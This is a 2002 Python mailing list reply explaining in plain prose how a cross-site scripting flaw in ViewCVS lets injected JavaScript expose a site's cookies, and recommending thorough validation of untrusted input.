Python cross-site scripting exploits?
Paul Boddie
paul at boddie.net
Thu May 23 11:59:09 EDT 2002
Robin Becker <robin at jessikat.fsnet.co.uk> wrote in message news:<DuIBcWA5WK78Ewyc at jessikat.fsnet.co.uk>...
>
[Cross-site scripting exploit in ViewCVS]
> Can some wizard kindly explain exactly how the client CGI is made
> responsible for security defence against bad URLs. It seems to me that
> the client browser should be responsible, but apparently not.
I haven't read up on these kinds of exploits, but what seems to happen
in this case is that some additional content gets posted to the
application (CGI program), and due to lack of "validation", this
content gets generated by the application "as is". Since this content
is now considered by the browser to have originated from the
application (or rather, its site), the cookie information associated
with that site is available to the additional content, and when some
JavaScript in that content presents the cookie information to another
site, the browser considers this as intentional behaviour of the
application in question.
> The alleged fix seems to involve more complete argument checking, is
> that required for any such defence? What should the request response be?
Argument checking and validation is the key here - never let your
application generate inputs from untrusted sources (ie. every source)
in the form they were received, regardless of where the output is
going to be used. Having said that, it is surprising that bizarre, and
potentially illegal, URLs can be passed to servers in this way.
Paul
More information about the Python-list
mailing list